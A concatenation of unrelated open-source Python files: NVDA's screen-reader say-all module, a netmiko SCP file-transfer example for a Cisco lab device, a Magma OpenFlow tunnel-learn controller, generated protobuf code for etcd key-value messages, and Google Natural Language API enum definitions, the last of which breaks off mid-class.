params_dict = self.get_params(self.learn_program)
return params_dict
|
# A part of NonVisual Desktop Access (NVDA)
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
# Copyright (C) 2006-2021 NV Access Limited, Peter Vágner, Aleksey Sadovoy, Babbage B.V., Bill Dengler,
# Julien Cochuyt
from enum import IntEnum
from typing import TYPE_CHECKING
import weakref
import garbageHandler
from .speech import (
speak,
getTextInfoSpeech,
SpeakTextInfoState,
speakObject,
)
from logHandler import log
import config
import controlTypes
import api
import textInfos
import queueHandler
import winKernel
from .commands import CallbackCommand, EndUtteranceCommand
from .speechWithoutPauses import SpeechWithoutPauses
from .types import (
_flattenNestedSequences,
)
if TYPE_CHECKING:
import NVDAObjects
class CURSOR(IntEnum):
CARET = 0
REVIEW = 1
SayAllHandler = None
def initialize():
global SayAllHandler
SayAllHandler = _SayAllHandler(SpeechWithoutPauses(speakFunc=speak))
class _SayAllHandler:
def __init__(self, speechWithoutPausesInstance: SpeechWithoutPauses):
self.lastSayAllMode = None
self.speechWithoutPausesInstance = speechWithoutPausesInstance
#: The active say all manager.
#: This is a weakref because the manager should be allowed to die once say all is complete.
self._getActiveSayAll = lambda: None # noqa: Return None when called like a dead weakref.
def stop(self):
'''
Stops any active objects reader and resets the SayAllHandler's SpeechWithoutPauses instance
'''
active = self._getActiveSayAll()
if active:
active.stop()
self.speechWithoutPausesInstance.reset()
def isRunning(self):
"""Determine whether say all is currently running.
@return: C{True} if say all is currently running, C{False} if not.
@rtype: bool
"""
return bool(self._getActiveSayAll())
def readObjects(self, obj: 'NVDAObjects.NVDAObject'):
reader = _ObjectsReader(self, obj)
self._getActiveSayAll = weakref.ref(reader)
reader.next()
def readText(self, cursor: CURSOR):
self.lastSayAllMode = cursor
try:
reader = _TextReader(self, cursor)
except NotImplementedError:
log.debugWarning("Unable to make reader", exc_info=True)
return
self._getActiveSayAll = weakref.ref(reader)
reader.nextLine()
class _ObjectsReader(garbageHandler.TrackedObject):
def __init__(self, handler: _SayAllHandler, root: 'NVDAObjects.NVDAObject'):
self.handler = handler
self.walker = self.walk(root)
self.prevObj = None
def walk(self, obj: 'NVDAObjects.NVDAObject'):
yield obj
child=obj.simpleFirstChild
while child:
for descendant in self.walk(child):
yield descendant
child=child.simpleNext
def next(self):
if not self.walker:
# We were stopped.
return
if self.prevObj:
# We just started speaking this object, so move the navigator to it.
api.setNavigatorObject(self.prevObj, isFocus=self.handler.lastSayAllMode == CURSOR.CARET)
winKernel.SetThreadExecutionState(winKernel.ES_SYSTEM_REQUIRED)
# Move onto the next object.
self.prevObj = obj = next(self.walker, None)
if not obj:
return
# Call this method again when we start speaking this object.
callbackCommand = CallbackCommand(self.next, name="say-all:next")
speakObject(obj, reason=controlTypes.OutputReason.SAYALL, _prefixSpeechCommand=callbackCommand)
def stop(self):
self.walker = None
class _TextReader(garbageHandler.TrackedObject):
"""Manages continuous reading of text.
This is intended for internal use only.
The high level flow of control is as follows:
1. The constructor sets things up.
2. L{nextLine} is called to read the first line.
3. When it speaks a line, L{nextLine} request that L{lineReached} be called
when we start speaking this line, providing the position and state at this point.
4. When we start speaking a line, L{lineReached} is called
and moves the cursor to that line.
5. L{lineReached} calls L{nextLine}.
6. If there are more lines, L{nextLine} works as per steps 3 and 4.
7. Otherwise, if the object doesn't support page turns, we're finished.
8. If the object does support page turns,
we request that L{turnPage} be called when speech is finished.
9. L{turnPage} tries to turn the page.
10. If there are no more pages, we're finished.
11. If there is another page, L{turnPage} calls L{nextLine}.
"""
MAX_BUFFERED_LINES = 10
def __init__(self, handler: _SayAllHandler, cursor: CURSOR):
self.handler = handler
self.cursor = cursor
self.trigger = SayAllProfileTrigger()
self.reader = None
# Start at the cursor.
if cursor == CURSOR.CARET:
try:
self.reader = api.getCaretObject().makeTextInfo(textInfos.POSITION_CARET)
except (NotImplementedError, RuntimeError) as e:
raise NotImplementedError("Unable to make TextInfo: " + str(e))
else:
self.reader = api.getReviewPosition()
# #10899: SayAll profile can't be activated earlier because they may not be anything to read
self.trigger.enter()
self.speakTextInfoState = SpeakTextInfoState(self.reader.obj)
self.numBufferedLines = 0
def nextLine(self):
if not self.reader:
log.debug("no self.reader")
# We were stopped.
return
if not self.reader.obj:
log.debug("no self.reader.obj")
# The object died, so we should too.
self.finish()
return
bookmark = self.reader.bookmark
# Expand to the current line.
# We use move end rather than expand
# because the user might start in the middle of a line
# and we don't want to read from the start of the line in that case.
# For lines after the first, it's also more efficient because
# we're already at the start of the line, so there's no need to search backwards.
delta = self.reader.move(textInfos.UNIT_READINGCHUNK, 1, endPoint="end")
if delta <= 0:
# No more text.
if isinstance(self.reader.obj, textInfos.DocumentWithPageTurns):
# Once the last line finishes reading, try turning the page.
cb = CallbackCommand(self.turnPage, name="say-all:turnPage")
self.handler.speechWithoutPausesInstance.speakWithoutPauses([cb, EndUtteranceCommand()])
else:
self.finish()
return
# Copy the speakTextInfoState so that speak callbackCommand
# and its associated callback are using a copy isolated to this specific line.
state = self.speakTextInfoState.copy()
# Call lineReached when we start speaking this line.
# lineReached will move the cursor and trigger reading of the next line.
def _onLineReached(obj=self.reader.obj, state=state):
self.lineReached(obj, bookmark, state)
cb = CallbackCommand(
_onLineReached,
name="say-all:lineReached"
)
# Generate the speech sequence for the reader textInfo
# and insert the lineReached callback at the very beginning of the sequence.
# _linePrefix on speakTextInfo cannot be used here
# As it would be inserted in the sequence after all initial control starts which is too late.
speechGen = getTextInfoSpeech(
self.reader,
unit=textInfos.UNIT_READINGCHUNK,
reason=controlTypes.OutputReason.SAYALL,
useCache=state
)
seq = list(_flattenNestedSequences(speechGen))
seq.insert(0, cb)
# Speak the speech sequence.
spoke = self.handler.speechWithoutPausesInstance.speakWithoutPauses(seq)
# Update the textInfo state ready for when speaking the next line.
self.speakTextInfoState = state.copy()
# Collapse to the end of this line, ready to read the next.
try:
self.reader.collapse(end=True)
except RuntimeError:
# This occurs in Microsoft Word when the range covers the end of the document.
# without this exception to indicate that further collapsing is not possible, say all could enter an infinite loop.
self.finish()
return
if not spoke:
# This line didn't include a natural pause, so nothing was spoken.
self.numBufferedLines += 1
if self.numBufferedLines < self.MAX_BUFFERED_LINES:
# Move on to the next line.
# We queue this to allow the user a chance to stop say all.
queueHandler.queueFunction(queueHandler.eventQueue, self.nextLine)
else:
# We don't want to buffer too much.
# Force speech. lineReached will resume things when speech catches up.
self.handler.speechWithoutPausesInstance.speakWithoutPauses(None)
# The first buffered line has now started speaking.
self.numBufferedLines -= 1
def lineReached(self, obj, bookmark, state):
# We've just started speaking this line, so move the cursor there.
state.updateObj()
updater = obj.makeTextInfo(bookmark)
if self.cursor == CURSOR.CARET:
updater.updateCaret()
if self.cursor != CURSOR.CARET or config.conf["reviewCursor"]["followCaret"]:
api.setReviewPosition(updater, isCaret=self.cursor == CURSOR.CARET)
winKernel.SetThreadExecutionState(winKernel.ES_SYSTEM_REQUIRED)
if self.numBufferedLines == 0:
# This was the last line spoken, so move on.
self.nextLine()
else:
self.numBufferedLines -= 1
def turnPage(self):
try:
self.reader.obj.turnPage()
except RuntimeError:
log.debug("No more pages")
# No more pages.
self.stop()
return
self.reader = self.reader.obj.makeTextInfo(textInfos.POSITION_FIRST)
self.nextLine()
def finish(self):
# There is no more text.
# Call stop to clean up, but only after speech completely finishes.
# Otherwise, if a different synth is being used for say all,
# we might switch synths too early and truncate the final speech.
# We do this by putting a CallbackCommand at the start of a new utterance.
cb = CallbackCommand(self.stop, name="say-all:stop")
self.handler.speechWithoutPausesInstance.speakWithoutPauses([
EndUtteranceCommand(),
cb,
EndUtteranceCommand()
])
def stop(self):
if not self.reader:
return
self.reader = None
self.trigger.exit()
self.trigger = None
def __del__(self):
self.stop()
class SayAllProfileTrigger(config.ProfileTrigger):
"""A configuration profile trigger for when say all is in progress.
"""
spec = "sayAll"
|
import os
from getpass import getpass
from netmiko import ConnectHandler, file_transfer
# Code so automated tests will run properly
password = os.getenv("NETMIKO_PASSWORD") if os.getenv("NETMIKO_PASSWORD") else getpass()
# Need a privilege15 account (no enable call)
cisco3 = {
"device_type": "cisco_ios",
"host": "cisco3.lasthop.io",
"username": "pyclass",
"password": password,
}
# Secure copy server must be enable on the device ('ip scp server enable')
source_file = "test2.txt"
dest_file = "test2.txt"
direction = "get"
file_system = "flash:"
ssh_conn = ConnectHandler(**cisco3)
transfer_dict = file_transfer(
ssh_conn,
source_file=source_file,
dest_file=dest_file,
file_system=file_system,
direction=direction,
# Overwrite the target file (if it already exists)
overwrite_file=True, # default "will not overwrite"
# verify_file=True, # default "will verify"
)
print(transfer_dict)
ssh_conn.disconnect()
|
"""
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from .base import MagmaController, ControllerType
from magma.pipelined.openflow import flows
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import Direction, DIRECTION_REG
class TunnelLearnController(MagmaController):
"""
A controller that sets up tunnel/ue learn flows based on uplink UE traffic
to properly route downlink packets back to the UE (through the correct GRE
flow tunnel).
This is an optional controller and will only be used for setups with flow
based GRE tunnels.
"""
APP_NAME = "tunnel_learn"
APP_TYPE = ControllerType.PHYSICAL
def __init__(self, *args, **kwargs):
super(TunnelLearnController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_next_table_num(self.APP_NAME)
self.tunnel_learn_scratch = \
self._service_manager.allocate_scratch_tables(self.APP_NAME, 1)[0]
self._datapath = None
def initialize_on_connect(self, datapath):
self._datapath = datapath
self._install_default_tunnel_classify_flows(self._datapath)
def _install_default_tunnel_classify_flows(self, dp):
"""
For direction OUT:
add flow with learn action(which will add a rule matching on UE
mac_addr in a scratch table, that will load the necessary
gre infomration for the incoming(direction IN) flow)
For direction IN:
Will get forwarded to the scratch table and matched on the flow
from the learn action
Finally will get forwarded to the next table
"""
parser = dp.ofproto_parser
# Add a learn action that will match on UE mac, and:
# load gre tun_id, swap and load gre tun src and gre tun dst mac
# Example learned flow:
# reg1=0x10,dl_dst=aa:29:3e:95:64:40
# actions=load:0x1389->NXM_NX_TUN_ID[0..31],
# load:0xc0a84666->NXM_NX_TUN_IPV4_DST[],
# load:0xc0a84665->NXM_NX_TUN_IPV4_SRC[]
#
outbound_match = MagmaMatch(direction=Direction.OUT)
actions = [
parser.NXActionLearn(
table_id=self.tunnel_learn_scratch,
priority=flows.DEFAULT_PRIORITY,
specs=[
parser.NXFlowSpecMatch(
src=('eth_src_nxm', 0),
dst=('eth_dst_nxm', 0),
n_bits=48
),
parser.NXFlowSpecMatch(
src=Direction.IN,
dst=(DIRECTION_REG, 0),
n_bits=32
),
parser.NXFlowSpecLoad(
src=('tunnel_id_nxm', 0),
dst=('tunnel_id_nxm', 0),
n_bits=32
),
parser.NXFlowSpecLoad(
src=('tun_ipv4_src', 0),
dst=('tun_ipv4_dst', 0),
n_bits=32
),
# TODO This might be getting overwritten by the IP stack,
# check if its required
parser.NXFlowSpecLoad(
src=('tun_ipv4_dst', 0),
dst=('tun_ipv4_src', 0),
n_bits=32
),
]
)
]
flows.add_resubmit_next_service_flow(dp, self.tbl_num,
outbound_match, actions,
priority=flows.MINIMUM_PRIORITY,
resubmit_table=self.next_table)
# The inbound match will first send packets to the scratch table,
# where global registers will be set and the packet will be dropped
# Then the final action will send packet down the pipelined(with the
# necessary tunnel information loaded from the scratch table)
inbound_match = MagmaMatch(direction=Direction.IN)
actions = [
parser.NXActionResubmitTable(table_id=self.tunnel_learn_scratch)]
flows.add_resubmit_next_service_flow(dp, self.tbl_num,
inbound_match, actions,
priority=flows.MINIMUM_PRIORITY,
resubmit_table=self.next_table)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kv.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='kv.proto',
package='mvccpb',
syntax='proto3',
serialized_options=b'\n\024com.coreos.jetcd.apiP\001',
serialized_pb=b'\n\x08kv.proto\x12\x06mvccpb\"u\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\x0c\x12\x17\n\x0f\x63reate_revision\x18\x02 \x01(\x03\x12\x14\n\x0cmod_revision\x18\x03 \x01(\x03\x12\x0f\n\x07version\x18\x04 \x01(\x03\x12\r\n\x05value\x18\x05 \x01(\x0c\x12\r\n\x05lease\x18\x06 \x01(\x03\"\x91\x01\n\x05\x45vent\x12%\n\x04type\x18\x01 \x01(\x0e\x32\x17.mvccpb.Event.EventType\x12\x1c\n\x02kv\x18\x02 \x01(\x0b\x32\x10.mvccpb.KeyValue\x12!\n\x07prev_kv\x18\x03 \x01(\x0b\x32\x10.mvccpb.KeyValue\" \n\tEventType\x12\x07\n\x03PUT\x10\x00\x12\n\n\x06\x44\x45LETE\x10\x01\x42\x18\n\x14\x63om.coreos.jetcd.apiP\x01\x62\x06proto3'
)
_EVENT_EVENTTYPE = _descriptor.EnumDescriptor(
name='EventType',
full_name='mvccpb.Event.EventType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PUT', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETE', index=1, number=1,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=253,
serialized_end=285,
)
_sym_db.RegisterEnumDescriptor(_EVENT_EVENTTYPE)
_KEYVALUE = _descriptor.Descriptor(
name='KeyValue',
full_name='mvccpb.KeyValue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='mvccpb.KeyValue.key', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='create_revision', full_name='mvccpb.KeyValue.create_revision', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mod_revision', full_name='mvccpb.KeyValue.mod_revision', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version', full_name='mvccpb.KeyValue.version', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='mvccpb.KeyValue.value', index=4,
number=5, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='lease', full_name='mvccpb.KeyValue.lease', index=5,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=20,
serialized_end=137,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='mvccpb.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='mvccpb.Event.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='kv', full_name='mvccpb.Event.kv', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='prev_kv', full_name='mvccpb.Event.prev_kv', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_EVENT_EVENTTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=140,
serialized_end=285,
)
_EVENT.fields_by_name['type'].enum_type = _EVENT_EVENTTYPE
_EVENT.fields_by_name['kv'].message_type = _KEYVALUE
_EVENT.fields_by_name['prev_kv'].message_type = _KEYVALUE
_EVENT_EVENTTYPE.containing_type = _EVENT
DESCRIPTOR.message_types_by_name['KeyValue'] = _KEYVALUE
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
KeyValue = _reflection.GeneratedProtocolMessageType('KeyValue', (_message.Message,), {
'DESCRIPTOR' : _KEYVALUE,
'__module__' : 'kv_pb2'
# @@protoc_insertion_point(class_scope:mvccpb.KeyValue)
})
_sym_db.RegisterMessage(KeyValue)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), {
'DESCRIPTOR' : _EVENT,
'__module__' : 'kv_pb2'
# @@protoc_insertion_point(class_scope:mvccpb.Event)
})
_sym_db.RegisterMessage(Event)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Wrappers for protocol buffer enum types."""
import enum
class EncodingType(enum.IntEnum):
"""
Represents the text encoding that the caller uses to process the output.
Providing an ``EncodingType`` is recommended because the API provides
the beginning offsets for various outputs, such as tokens and mentions,
and languages that natively use different text encodings may access
offsets differently.
Attributes:
NONE (int): If ``EncodingType`` is not specified, encoding-dependent information
(such as ``begin_offset``) will be set at ``-1``.
UTF8 (int): Encoding-dependent information (such as ``begin_offset``) is calculated
based on the UTF-8 encoding of the input. C++ and Go are examples of
languages that use this encoding natively.
UTF16 (int): Encoding-dependent information (such as ``begin_offset``) is calculated
based on the UTF-16 encoding of the input. Java and JavaScript are
examples of languages that use this encoding natively.
UTF32 (int): Encoding-dependent information (such as ``begin_offset``) is calculated
based on the UTF-32 encoding of the input. Python is an example of a
language that uses this encoding natively.
"""
NONE = 0
UTF8 = 1
UTF16 = 2
UTF32 = 3
class DependencyEdge(object):
class Label(enum.IntEnum):
"""
The parse label enum for the token.
Attributes:
UNKNOWN (int): Unknown
ABBREV (int): Abbreviation modifier
ACOMP (int): Adjectival complement
ADVCL (int): Adverbial clause modifier
ADVMOD (int): Adverbial modifier
AMOD (int): Adjectival modifier of an NP
APPOS (int): Appositional modifier of an NP
ATTR (int): Attribute dependent of a copular verb
AUX (int): Auxiliary (non-main) verb
AUXPASS (int): Passive auxiliary
CC (int): Coordinating conjunction
CCOMP (int): Clausal complement of a verb or adjective
CONJ (int): Conjunct
CSUBJ (int): Clausal subject
CSUBJPASS (int): Clausal passive subject
DEP (int): Dependency (unable to determine)
DET (int): Determiner
DISCOURSE (int): Discourse
DOBJ (int): Direct object
EXPL (int): Expletive
GOESWITH (int): Goes with (part of a word in a text not well edited)
IOBJ (int): Indirect object
MARK (int): Marker (word introducing a subordinate clause)
MWE (int): Multi-word expression
MWV (int): Multi-word verbal expression
NEG (int): Negation modifier
NN (int): Noun compound modifier
NPADVMOD (int): Noun phrase used as an adverbial modifier
NSUBJ (int): Nominal subject
NSUBJPASS (int): Passive nominal subject
NUM (int): Numeric modifier of a noun
NUMBER (int): Element of compound number
P (int): Punctuation mark
PARATAXIS (int): Parataxis relation
PARTMOD (int): Participial modifier
PCOMP (int): The complement of a preposition is a clause
POBJ (int): Object of a preposition
POSS (int): Possession modifier
POSTNEG (int): Postverbal negative particle
PRECOMP (int): Predicate complement
PRECONJ (int): Preconjunt
PREDET (int): Predeterminer
PREF (int): Prefix
PREP (int): Prepositional modifier
PRONL (int): The relationship between a verb and verbal morpheme
PRT (int): Particle
PS (int): Associative or possessive marker
QUANTMOD (int): Quantifier phrase modifier
RCMOD (int): Relative clause modifier
RCMODREL (int): Complementizer in relative clause
RDROP (int): Ellipsis without a preceding predicate
REF (int): Referent
REMNANT (int): Remnant
REPARANDUM (int): Reparandum
ROOT (int): Root
SNUM (int): Suffix specifying a unit of number
SUFF (int): Suffix
TMOD (int): Temporal modifier
TOPIC (int): Topic marker
VMOD (int): Clause headed by an infinite form of the verb that modifies a noun
VOCATIVE (int): Vocative
XCOMP (int): Open clausal complement
SUFFIX (int): Name suffix
TITLE (int): Name title
ADVPHMOD (int): Adverbial phrase modifier
AUXCAUS (int): Causative auxiliary
AUXVV (int): Helper auxiliary
DTMOD (int): Rentaishi (Prenominal modifier)
FOREIGN (int): Foreign words
KW (int): Keyword
LIST (int): List for chains of comparable items
NOMC (int): Nominalized clause
NOMCSUBJ (int): Nominalized clausal subject
NOMCSUBJPASS (int): Nominalized clausal passive
NUMC (int): Compound of numeric modifier
COP (int): Copula
DISLOCATED (int): Dislocated relation (for fronted/topicalized elements)
ASP (int): Aspect marker
GMOD (int): Genitive modifier
GOBJ (int): Genitive object
INFMOD (int): Infinitival modifier
MES (int): Measure
NCOMP (int): Nominal complement of a noun
"""
UNKNOWN = 0
ABBREV = 1
ACOMP = 2
ADVCL = 3
ADVMOD = 4
AMOD = 5
APPOS = 6
ATTR = 7
AUX = 8
AUXPASS = 9
CC = 10
CCOMP = 11
CONJ = 12
CSUBJ = 13
CSUBJPASS = 14
DEP = 15
DET = 16
DISCOURSE = 17
DOBJ = 18
EXPL = 19
GOESWITH = 20
IOBJ = 21
MARK = 22
MWE = 23
MWV = 24
NEG = 25
NN = 26
NPADVMOD = 27
NSUBJ = 28
NSUBJPASS = 29
NUM = 30
NUMBER = 31
P = 32
PARATAXIS = 33
PARTMOD = 34
PCOMP = 35
POBJ = 36
POSS = 37
POSTNEG = 38
PRECOMP = 39
PRECONJ = 40
PREDET = 41
PREF = 42
PREP = 43
PRONL = 44
PRT = 45
PS = 46
QUANTMOD = 47
RCMOD = 48
RCMODREL = 49
RDROP = 50
REF = 51
REMNANT = 52
REPARANDUM = 53
ROOT = 54
SNUM = 55
SUFF = 56
TMOD = 57
TOPIC = 58
VMOD = 59
VOCATIVE = 60
XCOMP = 61
SUFFIX = 62
TITLE = 63
ADVPHMOD = 64
AUXCAUS = 65
AUXVV = 66
DTMOD = 67
FOREIGN = 68
KW = 69
LIST = 70
NOMC = 71
NOMCSUBJ = 72
NOMCSUBJPASS = 73
NUMC = 74
COP = 75
DISLOCATED = 76
ASP = 77
GMOD = 78
GOBJ = 79
INFMOD = 80
MES = 81
NCOMP = 82
class Document(object):
class Type(enum.IntEnum):
"""
The document types enum.
Attributes:
TYPE_UNSPECIFIED (int): The content type is not specified.
PLAIN_TEXT (int): Plain text
HTML (int): HTML
"""
TYPE_UNSPECIFIED = 0
PLAIN_TEXT = 1
HTML = 2
class Entity(object):
class Type(enum.IntEnum):
"""
The type of the entity. For most entity types, the associated metadata
is a Wikipedia URL (``wikipedia_url``) and Knowledge Graph MID
(``mid``). The table below lists the associated fields for entities that
have different metadata.
Attributes:
UNKNOWN (int): Unknown
PERSON (int): Person
LOCATION (int): Location
ORGANIZATION (int): Organization
EVENT (int): Event
WORK_OF_ART (int): Artwork
CONSUMER_GOOD (int): Consumer product
OTHER (int): Other types of entities
PHONE_NUMBER (int): Phone number The metadata lists the phone number, formatted according to
local convention, plus whichever additional elements appear in the text:
.. raw:: html
<li><code>number</code> – the actual number, broken down into
sections as per local convention</li> <li><code>national_prefix</code>
– country code, if detected</li> <li><code>area_code</code> –
region or area code, if detected</li> <li><code>extension</code> –
phone extension (to be dialed after connection), if detected</li></ul>
ADDRESS (int): Address The metadata identifies the street number and locality plus
whichever additional elements appear in the text:
.. raw:: html
<li><code>street_number</code> – street number</li>
<li><code>locality</code> – city or town</li>
<li><code>street_name</code> – street/route name, if detected</li>
<li><code>postal_code</code> – postal code, if detected</li>
<li><code>country</code> – country, if detected</li>
<li><code>broad_region</code> – administrative area, such as the
state, if detected</li> <li><code>narrow_region</code> – smaller
administrative area, such as county, if detected</li>
<li><code>sublocality</code> – used in Asian addresses to demark a
district within a city, if detected</li></ul>
DATE (int): Date<br><br>
The metadata identifies the components of the date:<ul>
<li><code>year</code> – four digit year, if detected</li>
<li><code>month</code> – two digit month number, if detected</li>
<li><code>day</code> – two digit day number, if detected</li></ul>
NUMBER (int): Number<br><br>
The metadata is the number itself.
PRICE (int): Price<br><br>
The metadata identifies the <code>value</code> and <code>currency</code>.
"""
UNKNOWN = 0
PERSON = 1
LOCATION = 2
ORGANIZATION = 3
EVENT = 4
WORK_OF_ART = 5
CONSUMER_GOOD = 6
OTHER = 7
PHONE_NUMBER = 9
ADDRESS = 10
DATE = 11
NUMBER = 12
PRICE = 13
class EntityMention(object):
class Type(enum.IntEnum):
"""
The supported types of mentions.
Attributes:
TYPE_UNKNOWN (int): Unknown
PROPER (int): Proper name
COMMON (int): Common noun (or noun compound)
"""
TYPE_UNKNOWN = 0
PROPER = 1
COMMON = 2
class PartOfSpeech(object):
class Aspect(enum.IntEnum):
"""
The characteristic of a verb that expresses time flow during an event.
Attributes:
ASPECT_UNKNOWN (int): Aspect is not applicable in the analyzed language or is not predicted.
PERFECTIVE (int): Perfective
IMPERFECTIVE (int): Imperfective
PROGRESSIVE (int): Progressive
"""
ASPECT_UNKNOWN = 0
PERFECTIVE = 1
IMPERFECTIVE = 2
PROGRESSIVE = 3
class Case(enum.IntEnum):
"""
The grammatical function performed by a noun or pronoun in a phrase,
clause, or sentence. In some languages, other parts of speech, such as
adjective and determiner, take case inflection in agreement with the noun.
Attributes:
CASE_UNKNOWN (int): Case is not applicable in the analyzed language or is not predicted.
ACCUSATIVE (int): Accusative
ADVERBIAL (int): Adverbial
COMPLEMENTIVE (int): Complementive
DATIVE (int): Dative
GENITIVE (int): Genitive
INSTRUMENTAL (int): Instrumental
LOCATIVE (int): Locative
NOMINATIVE (int): Nominative
OBLIQUE (int): Oblique
PARTITIVE (int): Partitive
PREPOSITIONAL (int): Prepositional
REFLEXIVE_CASE (int): Reflexive
RELATIVE_CASE (int): Relative
VOCATIVE (int): Vocative
"""
CASE_UNKNOWN = 0
ACCUSATIVE = 1
ADVERBIAL = 2
COMPLEMENTIVE = 3
DATIVE = 4
GENITIVE = 5
INSTRUMENTAL = 6
LOCATIVE = 7
NOMINATIVE = 8
OBLIQUE = 9
PARTITIVE = 10
PREPOSITIONAL = 11
REFLEXIVE_CASE = 12
RELATIVE_CASE = 13
VOCATIVE = 14
class Form(enum.IntEnum):
"""
Depending on the language, Form can be categorizing different forms of
verbs, adjectives, adverbs, etc. For example, categorizing inflected
endings of verbs and adjectives or distinguishing between short and long
forms of adjectives and participles
Attributes:
FORM_UNKNOWN (int): Form is not applicable in the analyzed language or is not predicted.
ADNOMIAL (int): Adnomial
AUXILIARY (int): Auxiliary
COMPLEMENTIZER (int): Complementizer
FINAL_ENDING (int): Final ending
GERUND (int): Gerund
REALIS (int): Realis
IRREALIS (int): Irrealis
SHORT (int): Short form
LONG (int): Long form
ORDER (int): Order form
SPECIFIC (int): Specific form
"""
FORM_UNKNOWN = 0
ADNOMIAL = 1
AUXILIARY = 2
COMPLEMENTIZER = 3
FINAL_ENDING = 4
GERUND = 5
REALIS = 6
IRREALIS = 7
SHORT = 8
LONG = 9
ORDER = 10
SPECIFIC = 11
class Gender(enum.IntEnum):
"""
Gender classes of nouns reflected in the behaviour of associated words.
Attributes:
GENDER_UNKNOWN (int): Gender is not applicable in the analyzed language or is not predicted.
FEMININE (int): Feminine
MASCULINE (int): Masculine
NEUTER (int): Neuter
"""
GENDER_UNKNOWN = 0
FEMININE = 1
MASCULINE = 2
NEUTER = 3
class Mood(enum.IntEnum):
"""
The grammatical feature of verbs, used for showing modality and attitude.
Attributes:
MOOD_UNKNOWN (int): Mood is not applicable in the analyzed language or is not predicted.
CONDITIONAL_MOOD (int): Conditional
IMPERATIVE (int): Imperative
INDICATIVE (int): Indicative
INTERROGATIVE (int): Interrogative
JUSSIVE (int): Jussive
SUBJUNCTIVE (int): Subjunctive
"""
MOOD_UNKNOWN = 0
CONDITIONAL_MOOD = 1
IMPERATIVE = 2
INDICATIVE = 3
INTERROGATIVE = 4
JUSSIVE = 5
SUBJUNCTIVE = 6
class Number(enum.IntEnum):
"""
Count distinctions.
Attributes:
NUMBER_UNKNOWN (int): Number is not applicable in the analyzed language or is not predicted.
SINGULAR (int): Singular
PLURAL (int): Plural
DUAL (int): Dual
"""
NUMBER_UNKNOWN = 0
SINGULAR = 1
PLURAL = 2
DUAL = 3
class Person(enum.IntEnum):
"""
The distinction between the speaker, second person, third person, etc.
Attributes:
PERSON_UNKNOWN (int): Person is not applicable in the analyzed language or is not predicted.
FIRST (int): First
SECOND (int): Second
